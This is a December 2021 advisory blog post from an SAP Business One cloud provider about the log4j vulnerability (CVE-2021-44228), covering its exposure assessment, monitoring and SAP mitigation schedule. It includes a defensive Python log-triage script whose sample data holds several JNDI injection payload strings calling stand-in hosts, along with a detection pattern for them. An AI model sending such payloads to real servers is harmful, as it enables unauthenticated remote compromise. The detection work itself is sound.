Everything you need to know about how the log4j vulnerability affects SAP and SMB Solutions Cloud users
Posted Thursday, December 16th, 2021.
On Friday, December 10, 2021, news of active exploitation of a previously unknown zero-day vulnerability (CVE-2021-44228) in a common component of Java-based software, referred to as log4j, became widely known.
The extent to which this software package is integrated into the world’s technologies and platforms is still being discovered, making response a fluid activity for any security program.
Situation Report
SMB Solutions Cloud Services has not assessed any material exposure to the log4j vulnerability that would impact the safe use of our products at this time.
Should this assessment change, we will update partners and customers immediately.
SMB Solutions has leveraged the intervening hours since the public disclosure of the exploitation to mount a comprehensive assessment and response.
This includes checking with critical vendors such as Sophos, Datto, Microsoft, SUSE and of course SAP for their current guidance and status of products deployed in the SMB Solutions Cloud Services environment.
We have raised this as a matter of urgency with senior SAP executives in light of the high level of usage of Apache and Java components in SAP Business One and associated solutions such as SAP HANA, B1i and SAP Business One Server Tools, and we will share any relevant responses with you, our partners, as we receive them.
The log4j Vulnerability
For those who remember, this log4j vulnerability will invoke memories of ShellShock in 2014. Drawing on that analogy, you can conclude that this log4j vulnerability is potentially the most impactful critical vulnerability that we have seen this year.
The exploitation of the vulnerability requires a single HTTP request containing malicious input from anywhere in the world, to an internet-facing server that is running a vulnerable instance of log4j. The result is a full system compromise, and the exploit requires no authentication. This is as bad as it comes, especially given how widely this common software component is deployed.
At this time, others in the security community have done fantastic work writing up how the vulnerability works. Please review the comprehensive write-ups released by CloudFlare and SANS Internet Storm Center if this is something that interests you at a detailed level.
Vulnerability Response
Our Security Operations team have:
- confirmed that the logging already in place is sufficient to observe malicious requests
- started creating new alerting rules to triage scan events in real time
- confirmed that none of the observed scan activity was successful: it did not result in C2 domain resolution or outbound connections
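The three checks above (observe the requests in existing logs, alert on them, and confirm they produced no outbound resolution) can be illustrated with a small triage script. The following is an added example written for this page, not SMB Solutions' or SAP's own tooling: it parses constructed combined-format web access log lines, URL-decodes each request, referer and User-Agent field, flags any embedded JNDI lookup string, and then checks a constructed resolver query log to see whether the host named in the lookup was ever resolved. All addresses, hostnames and timestamps are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (Apache/NGINX combined format). Source
# addresses and payload hosts use documentation ranges and example domains.
ACCESS_LOG = """\
203.0.113.10 - - [14/Dec/2021:10:01:02 +1100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Dec/2021:10:02:17 +1100] "GET /login?user=${jndi:ldap://scanner.example.net:1389/a} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.8 - - [14/Dec/2021:10:03:44 +1100] "GET / HTTP/1.1" 200 2048 "-" "${jndi:ldap://probe.example.org/x}"
198.51.100.9 - - [14/Dec/2021:10:04:01 +1100] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcanary.example.com%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
"""

# Constructed sample resolver query log for the web tier. Only one of the
# three payload hosts appears here, so only that request counts as a hit.
DNS_LOG = """\
14-Dec-2021 10:01:05 client 10.0.0.5#5353: query: updates.example.com IN A
14-Dec-2021 10:02:20 client 10.0.0.5#5353: query: scanner.example.net IN A
"""

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)
# A JNDI lookup string: the scheme, then the host a vulnerable server would
# contact. Matched case-insensitively after URL-decoding.
JNDI_RE = re.compile(
    r'\$\{jndi:(?P<scheme>[a-z]+):(?://)?(?P<host>[^:/}\s]+)', re.IGNORECASE
)
DNS_RE = re.compile(r'query: (?P<name>\S+) IN ')


def parse_access_log(text):
    """Split combined-format lines into named fields; skip malformed lines."""
    entries = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def normalise(value):
    """URL-decode until stable (scanners sometimes double-encode), then lowercase."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value.lower()


def find_jndi_lookups(entry):
    """Return (field, scheme, host) for every lookup string in one log entry."""
    hits = []
    for field in ("request", "referer", "user_agent"):
        for m in JNDI_RE.finditer(normalise(entry[field])):
            hits.append((field, m.group("scheme"), m.group("host")))
    return hits


def resolved_names(dns_text):
    """Set of hostnames the resolver log shows being queried."""
    return {m.group("name").lower() for m in DNS_RE.finditer(dns_text)}


def triage(access_text, dns_text):
    """Flag every lookup attempt and mark whether the resolver saw its host.

    'scan' means the request arrived but nothing resolved the named host;
    'possible-success' means the resolver did see that host and the event
    needs a human to look at the server in question.
    """
    seen = resolved_names(dns_text)
    alerts = []
    for entry in parse_access_log(access_text):
        for field, scheme, host in find_jndi_lookups(entry):
            resolved = host in seen
            alerts.append({
                "src": entry["src"], "ts": entry["ts"], "field": field,
                "scheme": scheme, "host": host, "resolved": resolved,
                "severity": "possible-success" if resolved else "scan",
            })
    return alerts


if __name__ == "__main__":
    for a in triage(ACCESS_LOG, DNS_LOG):
        print(f'{a["ts"]} {a["src"]:<14} {a["field"]:<10} '
              f'{a["scheme"]}://{a["host"]} -> {a["severity"]}')
```

Run as-is it prints three alerts: the two whose hosts never appear in the resolver log are classed as scans, while the one whose host does appear is escalated. In a real environment the DNS side would be the egress resolver or firewall log rather than a string constant, and the same lookup-string check should be applied to every field an application logs, not only the three shown here, since the vulnerable code path is the logging call rather than any particular HTTP header.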
We have undertaken initial scans to identify any potential areas of risk and continue to work with our software partners to take any necessary steps to mitigate these risks.
SAP Business One Mitigation Update
We have received a number of mitigation steps from SAP in the last 12 hours (as at 22:00 AEST, December 16th) relating to SAP Business One. We will be deploying these this coming weekend, as several of the steps require restarting SAP components, which may cause a number of short outages of 10 minutes each.
The SAP document is: 3131789 – Mitigate Log4j CVE-2021-44228 Vulnerability in SAP Business One – SAP ONE Support Launchpad (SAP S Number authentication may be required).
We will communicate these outages via our status.smbsolutions.com.au page.
Looking Forward
The days and weeks ahead will be challenging as exploits mature and evolve, more becomes known about common technologies that have this vulnerability embedded within them, and more third-party disclosures come out regarding technology susceptibility.
It is reasonable to predict that mass exploitation will occur in the near future. It is also likely that ransomware affiliate groups will include this exploit in their playbooks and ransomware threat actors will embed exploitation of this vulnerability into their malware kits.
The good news is that we and our security vendors continue to take action and invest heavily to combat these malicious actors. You can rest assured that the SMB Solutions Cloud Services team continues to remain vigilant against these threats.
If you have any concerns regarding this or any other aspect of your relationship with SMB Solutions Cloud Services, please feel free to reach out to Richard or any of the support team here.